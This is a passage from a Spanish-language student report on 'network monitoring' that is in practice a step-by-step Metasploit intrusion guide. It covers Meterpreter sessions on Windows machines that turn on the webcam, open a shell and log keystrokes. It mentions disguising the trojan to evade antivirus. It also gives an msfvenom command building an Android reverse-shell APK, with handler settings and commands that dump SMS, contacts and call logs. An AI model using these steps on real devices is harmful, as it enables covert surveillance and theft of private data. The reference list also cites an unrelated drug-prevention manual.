Imagen 58 Comando exploit –j herramienta en espera de activar virus

Page 63: Monitoreo de Redes

62

Ahora es tiempo de esperar, debe conectarse una computadora activando el

virus.

Imagen 59 Activación de virus e inicio de sesión con comando sessions -i

Como se puede apreciar en la primera línea, se logra la conexión con un equipo

que activo el virus.

Para apreciarlo mejor basta con introducir el comando sessions -i , que

mostrara en lista las computadoras con las que se puede iniciar sesión con un

“Id” para poder elegirlo.

Escogiendo la victima por su identificador se debe insertar el comando necesario

sessions -i (identificador) , como en el caso de la practica fue el número “1”.

Ahora estando conectados, se encuentra en funcionamiento la herramienta

“meterpreter”.

Imagen 60 Selección de sesión dependiendo del identificador

Page 64: Monitoreo de Redes

Algunos comandos que se pueden usar fueron, “ps”, sirve para ver los procesos

activos en el equipo de cómputo víctima.

Imagen 61 Procesos activos de victima

Otro comando útil es “run webcam”, para activar la webcam de la víctima.

Imagen 62 Activación de webcam

Page 65: Monitoreo de Redes

64

Para observar lo que graba la webcam, es necesario entrar a los archivos en

back Track 5, entrar a la carpeta de usuario “root”, aparecerá un archivo de

nombre “webcam.htm”, se debe abrir con el explorador de internet disponible.

Imagen 63 Ubicación de archivo para ver webcam

Estará mostrando capturas que hace la cámara al estar activada, las muestra

desde el explorador de internet, y se actualiza la imagen constantemente. Basta

con presionar la tecla “F5” para estar actualizando.

Imagen 64 webcam activada imágenes actualización constante

Page 66: Monitoreo de Redes

Para detener un comando o tarea desde la consola basta con presionar una

combinación de teclas. Por ejemplo detener la webcam el comando es “Ctrl+c”.

Imagen 65 Detener webcam Ctrl+c

Para poder entrar al disco duro de la víctima y manipular sus archivos, basta con

introducir en la consola el comando “shell”.

Imagen 66 Comando Shell para entrar al disco duro de la victima

La ubicación por defecto a la que manda es el escritorio de la víctima.

En esta ocasión solo se crearon unas carpetas en el escritorio con el comando

“mkdir (nombre de carpeta)”.

Imagen 67 Comando mkdir para crear carpetas

Page 67: Monitoreo de Redes

66

Imagen 68 Escritorio de la computadora victima carpetas creadas

Para ver el contenido de archivos donde está ubicada la herramienta se usa el

comando “dir”.

Imagen 69 Comando dir para ver contenido de ubicación

Page 68: Monitoreo de Redes

Para salir de su disco duro basta con escribir “exit”. Regresando a la herramienta

“meterpreter”.

Otro comando con una función importante es el “keyscan_start” sirve para

mostrar todo lo que la víctima tecle, desde combinación de teclas hasta texto.

Cada vez que se consulte se debe usar el comando “keyscan_dump”.

Para detener esta función se usa el comando “keyscan_stop”.

Imagen 70 uso de comando keyscan muestra lo que teclea la victima

En este caso la victima escribió “esta es una prueba de captura del teclado

jejejejeje”.

Existen muchos comando más con otras funciones, en caso de no contar con

una lista de ellos, basta con introducir el comando “help”.

Para finalizar la comunicación con la victima basta con presionar nuevamente el

comando “exit”.

Resultados.

A través del sistema operativo Back Track 5 r3 se logró monitorear equipos de

cómputo que mantenían una conexión en red, sin importar que la conexión fuera

a través de wi-fi o cableada.

Se creó un virus troyano gracias la herramienta Metaexploit, el troyano permite

la conexión entre equipos, la computadora víctima y el atacante.

Dando acceso completo al computador atacante en actividades como prender la

cámara de forma remota, acceder a los archivos dentro del disco duro, crear,

borrar, editar, leer y eliminar archivos. Incluso ver los procesos activos o las

versiones y el tipo de software instalado.

La práctica fue totalmente funcional, fue probada en Windows 7, 8.1 y 10.

Page 69: Monitoreo de Redes

68

Imagen 71 Logo Windows 7

Imagen 72 Logo Windows 8.1

Imagen 73 Logo Windows 10

Hallando al antivirus como una desventaja, siendo capaz de eliminar el virus.

Por lo cual se exploró la posibilidad de disfrazar el virus como un archivo más en

el computador. Permitiendo que fuera indetectable, teniendo una infiltración sin

obstrucciones.

Conclusión.

Es importante el monitoreo en red, depende de los fines para los que se use.

Monitorear como lo hacen las grandes empresas para tomar decisiones respecto

a las horas laborales de sus empleados. Por otra parte el monitoreo sin

consentimiento es ilegal. Existen diferentes programas o herramientas que

permiten el monitoreo en red con muchas ventajas.

El uso de back Track nos permitió tener el monitoreo desde otro enfoque, tener

en cuenta la seguridad de nuestra información y los vulnerables que se puede

pueden volver nuestros equipos en un ambiente laboral, como el personal.

Page 70: Monitoreo de Redes

Referencias

Blogspot. (s.f.). Recuperado el 14 de Octubre de 2015, de

http://infomed66.blogspot.com.es/2015/02/backtrack-5-r3-version-completa-del.html

Instalación de Back Track 5 r3. (s.f.). Recuperado el 14 de Octubre de 2015, de

http://www.backtrack-linux.org/backtrack/backtrack-5-r3-released/

Página oficial de Back Track. (s.f.). Recuperado el 13 de Octubre de 2015, de

http://www.backtrack-linux.org/backtrack/backtrack-5-r3-released/

Unidas, N. (2002). Manual sobre programas de prevención del uso indebido de drogas con

participación de los jóvenes. Nueva York: Oficina de las Naciones Unidas de

Fiscalización de Drogas y Prevención del Delito.

Youtube. (s.f.). Recuperado el 16 de Octubre de 2015, de

https://www.youtube.com/watch?v=2u86qAH3Iek

Youtube. (s.f.). Recuperado el 17 de Octubre de 2015, de

https://www.youtube.com/watch?v=z55LdIZnSz0

Page 71: Monitoreo de Redes

70

Kali Linux.

Kali Linux es una distribución basada en Debian GNU/Linux diseñada

principalmente para la auditoría y seguridad informática en general. Fue fundada

y es mantenida por Offensive Security Ltd. Mati Aharoni and Devon Kearns,

ambos pertenecientes al equipo de Offensive Security, desarrollaron la

distribución a partir de la reescritura de BackTrack, que se podría denominar

como la antecesora de Kali Linux.

Kali Linux trae preinstalados más de 600 programas incluyendo Nmap (un

escáner de puertos), Wireshark (un sniffer), John the Ripper (un crackeador de

passwords) y la suite Aircrack-ng (software para pruebas de seguridad en redes

inalámbricas). Kali puede ser usado desde un Live CD, live-usb y también puede

ser instalada como sistema operativo principal.

Kali se distribuye en imágenes ISO compiladas para diferentes arquitecturas

(32/64 bits y ARM), y trabaja bajo licencia GPL (licencia pública general).

Instalación de Kali Linux en Vmware Workstation 11.0

Requisitos de instalación de Kali Linux.

Un mínimo de 8 GB de espacio en disco para la instalación de Kali Linux.

Para las arquitecturas i386 y amd64, un mínimo de 1GB de RAM.

Tener instalado Vmware Workstation 11.0

Para poder comenzar la instalación es necesario descargar el software adecuado a la

arquitectura de su computadora, Ya sea de 32 o 64 bits.

En esta ocasión utilizamos una computadora con arquitectura de 64 bits por lo tanto la ISO es

de 64.

Descargamos el software del siguiente link:

https://www.kali.org/downloads/

Page 72: Monitoreo de Redes

Ilustración 57 Descarga de Kali Linux

Una vez descargado la ISO vamos a crear la máquina virtual en Vmware Workstation.

1.- Abrimos el software Vmware Workstatiton y selecionamos en el menú la opción file dentro

de file seleccionar new virtual machine.

Ilustración 58 Creación de la máquina virtual.

2.- En la siguiente pantalla seleccionaremos Custom y click en siguiente.

Page 73: Monitoreo de Redes

72

Ilustración 59 Creación de la máquina virtual 1.2

3.- Le damos click en next.

Ilustración 60 Creación de la máquina virtual 1.3

4.- seleccionaremos la ISO de Kali Linux y le daremos click en next.

Page 74: Monitoreo de Redes

Ilustración 61 Creación de la máquina virtual 1.4

5.- Seleccionaremos el sistema operativo Linux y su versión, en este caso le puedes dejar las

opciones predeterminadas y le daremos click en next.

Ilustración 62 Creación de la máquina virtual.1.5

6.- Damos un nombre a la máquina virtual y seleccionamos la ubicación de donde se va a guardar

la instalación, podemos también dejar las opciones que nos de por defecto y le daremos click en

next.

Page 75: Monitoreo de Redes

74

Ilustración 63 Creación de la máquina virtual.1.7

7.-En la siguiente pantalla seleccionaremos el número de procesadores y el número de cores

del mismo. Esta parte ya depende de la arquitectura de la computadora de lo que pueda

disponer, en este caso tiene un procesador i3 y le daremos click en next.

Ilustración 64 Creación de la máquina virtual.1.8

8.- Seleccionaremos la cantidad de memoria RAM que deseamos que tenga la máquina virtual,

esta parte también depende mucho de las capacidades de la computadora, en este caso se

cuenta con una memoria de 8GB de ram por lo tanto se seleccionó 4GB y le daremos click en

next.

Page 76: Monitoreo de Redes

Ilustración 65 Creación de la máquina virtual.1.9

9.-En la siguiente pantalla tendremos que seleccionar el tipo de conexión de red que deseemos

y le daremos click en next.

Ilustración 66 Creación de la máquina virtual.1.10

10.- En esta ventana dejamos las opciones por defecto y le daremos click en next.

Page 77: Monitoreo de Redes

76

Ilustración 67 Creación de la máquina virtual.1.11

11.- Creamos un disco duro virtual para que pueda alojar a Kali Linux.En esta parte podemos

dejar la opción predeterminada y dar click en next.

Ilustración 68 Creación de la máquina virtual. 1.12

12.- Seleccionamos el tipo de disco virtual, dejamos la opción por defecto y le damos click en

next.

Page 78: Monitoreo de Redes

Ilustración 69 Creación de la máquina virtual.1.13

13.- Seleccionaremos la capacidad del disco virtual, podemos poner una cantidad que ocupemos

o dejar las opciones por defecto.

Ilustración 70 Creación de la máquina virtual.1.14

14.- En esta pantalla dejamos las opciones por defecto y le damos click en next.

Ilustración 71 Creación de la máquina virtual.1.15

15.- En esta pantalla aparece el resumen de toda la configuración de la máquina virtual que esta

por crearse, para finalizar le daremos click en finish y ya tendremos la maquina creada.

Page 79: Monitoreo de Redes

78

Ilustración 72 Creación de la máquina virtual.1.16

Después de descargar, crear y configurar la máquina virtual ahora si pasaremos a instalar Kali

Linux.

1.- Encendemos la máquina virtual.

2.- Seleccionaremos la opción de graphical install y le daremos entre.

Ilustración 73 Instalación de Kali Linux.

3.- Seleccionaremos el lenguaje de instalación, buscamos y seleccionamos español y click en

continuar.

Page 80: Monitoreo de Redes

Ilustración 74 Instalación de Kali Linux. 1.2

4.- Seleccionaremos la ubicación en este caso es México y click en continuar.

Ilustración 75 Instalación de Kali Linux. 1.3

5.-Configuramos el idioma del teclado, en esta opción seleccionaremos latinoamericano y click

en continuar.

Ilustración 76 Instalación de Kali Linux. 1.4

6.-Esperamos a que cargue todos los componentes y click en continuar.

Page 81: Monitoreo de Redes

80

Ilustración 77 Instalación de Kali Linux. 1.5

7.-Esperamos a que configure automáticamente la red y click en continuar.

Ilustración 78 Instalación de Kali Linux. 1.6

8.-En esta pantalla te pide que le des un nombre a la máquina, puedes dejarlo por defecto click

en continuar.

Ilustración 79 Instalación de Kali Linux. 1.7

9.- Te pedirá un nombre para el dominio le puedes colocar uno o dejarle la opción que trae por

defecto y click en continuar.

Page 82: Monitoreo de Redes

Ilustración 80 Instalación de Kali Linux. 1.8

10.-Te pedirá que coloques la clave del superusuario o también conocido como root, en este

caso es itesa y le darás click en continuar.

Ilustración 81 Instalación de Kali Linux. 1.9

11.-Esperamos a que configure el reloj automáticamente y click en continuar.

Ilustración 82 Instalación de Kali Linux. 1.10

12.-Seleccionamos la opción que dice Guiado-utilización de todo el disco y le damos click en

continuar.

Page 83: Monitoreo de Redes

82

Ilustración 83 Instalación de Kali Linux. 1.11

13.- Seleccionamos el disco, como solo creamos uno damos en continuar.

Ilustración 84 Instalación de Kali Linux. 1.12

14. Podemos dejar la opción por defecto (recomendado para novatos) y click en continuar.

Ilustración 85 Instalación de Kali Linux. 1.13

15. nos muestra las particiones del disco, seleccionamos finalizar el particionado y escribir los

cambios en el disco y click en continuar.

Page 84: Monitoreo de Redes

Ilustración 86 Instalación de Kali Linux. 1.14

16. Seleccionamos si para confirmar los cambios en el disco y click en continuar.

Ilustración 87 Instalación de Kali Linux. 1.15

17. Comienza el proceso de formateo del disco e instalación del sistema operativo, esto suele

durar unos minutos.

Ilustración 88 Instalación de Kali Linux. 1.16

18. Seleccionamos no y le damos click en continuar.

Page 85: Monitoreo de Redes

84

Ilustración 89 Instalación de Kali Linux. 1.17

19. Esperamos a que configure el gestor de paquetes y le damos click en instalar.

Ilustración 90 Instalación de Kali Linux. 1.18

20. Esperamos a que se instale el cargador de arranque GRUB.

Ilustración 91 Instalación de Kali Linux. 1.19

21. En este caso seleccionamos si y click en continuar.

Page 86: Monitoreo de Redes

Ilustración 92 Instalación de Kali Linux. 1.20

22. Esperamos a que finalice la instalación.

Ilustración 93 Instalación de Kali Linux. 1.21

23. Terminar la instalación damos click en continuar.

Ilustración 94 Instalación de Kali Linux. 1.22

24. Se reinicia la máquina virtual.

Page 87: Monitoreo de Redes

86

Ilustración 95 Instalación de Kali Linux. 1.23

28. Ya tendremos el kali instalado.

Ilustración 96 Kali Linux instalado escritorio principal

Práctica en Kali Linux

Infectar con un virus un teléfono celular con Android utilizando Kali Linux.

1.- conectamos nuestro equipo de cómputo a internet.

Ilustración 97 Conexión a redes inálambricas

2.- Ejecutamos nuestra máquina virtual la que contiene a Kali Linux.

Page 88: Monitoreo de Redes

Ilustración 98 Vista de máquina virtual

3.- Iniciamos sesión con el usuario root e introducimos la contraseña que en este caso es itesa.

Ilustración 99 Login de Kali Linux

Ilustración 100 Login de Kali linux 1.2

Page 89: Monitoreo de Redes

88

4.- comprobamos que tengamos internet en la máquina virtual para esto abrimos el navegador

web.

Ilustración 101 Verificación de red.

5.- abrimos un cmd y tecleamos ifconfig para saber que ip tiene la máquina virtual.

Ilustración 102 Checando ip de la máuina virtual.

6.- abrimos una nueva ventana de comandos y tecleamos lo siguiente:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.67 LPORT=3333 R >

prueba2.apk

Ilustración 103 Creando apk para el celular

7.- Verificamos que se haya creado la app estará ubicada en la siguiente ruta: en la carpeta de

archivos personales

Page 90: Monitoreo de Redes

Ilustración 104 Carpeta de archivos

Ilustración 105 Vista del contenido de Carpeta personal

8.- conectamos nuestro teléfono celular al equipo de cómputo para poder pasarle la app creada.

Ilustración 106 Conexión de teléfono con la pc

Page 91: Monitoreo de Redes

90

Ilustración 107 Contenido del celular

9.-abriremos la ventana de metasploit y teclearemos los siguientes comandos:

use multi/handler

set PAYLOAD android/meterpreter/reverse_tcp

set LHOST 192.168.1.66

set LPORT 3333

show options

exploit

Ilustración 108 Icono de Metasploit

Ilustración 109 Pantalla principal de Metasploit

Page 92: Monitoreo de Redes

Ilustración 110 Asignación de dirección y puertos

10.- Ejecutamos la app en el celular.

11.-Se mostrará esta pantalla que indicara cuando ya están conectados.

Ilustración 111 Sincronización entre la pc y el celular

12.- Una vez teniendo comunicación con el teléfono teclearemos cualquiera de estos comandos:

help

dump_calllog

dump_sms

Page 93: Monitoreo de Redes

92

check_root

dump_contacts

webcam_snap

webcam_list

13.- Se hicieron las siguientes pruebas con algunos comandos y estos fueron los resultados.

Ilustración 112 Prueba de comandos

Ilustración 113 Prueba del comando dump_calllog

Page 94: Monitoreo de Redes

Ilustración 114 Prueba del comando dump_contacts

Ilustración 115 Prueba del comando dump_sms

Page 95: Monitoreo de Redes

94

Ilustración 116 Prueba del comando webcam_snap

14.- Por ultimo después de utilizarlo cerramos la conexión.

Ilustración 117 Desconexión entre los equipos

Page 96: Monitoreo de Redes

Conclusiones

Se tuvo que investigar desde cero ya que no se tenían conocimientos sobre como instalar kali

Linux ni mucho menos como utilizarlo, después de encontrar como instalarlo hubo que probarlo

instalándolo en equipo físico al igual que también en máquina virtual para comparar resultado,

nos topamos con un problema que en cada versión de Kali Linux varia la escritura de los

comandos para realizar la práctica, una vez que se tenía la sintaxis correcta se puso en marcha

la elaboración de la app para el celular Android y se probaron varios comandos se llegó a la

conclusión que este software es bastante potente, ya que se utiliza en la vida real para

monitorear alguna red y más que nada se centra en la seguridad informática, cuenta con muchas

herramientas que se utilizan para lo ya antes mencionado y que solo le dimos un pequeñísima

demostración de lo que es capaz de hacer este software, lo que más nos agrado es que es

totalmente gratuito a comparación de otros software que solo son de prueba.

Referencias

https://www.kali.org/downloads/

https://www.youtube.com/watch?v=-OCmvFPlJZc

https://siensi.wikispaces.com/file/view/Instalaci%C3%B3n+Kali+Linux+en+VMware.pdf

https://www.youtube.com/watch?v=a4GTzn6uYII

https://www.youtube.com/watch?v=XKB0vx8d4mQ


Recommended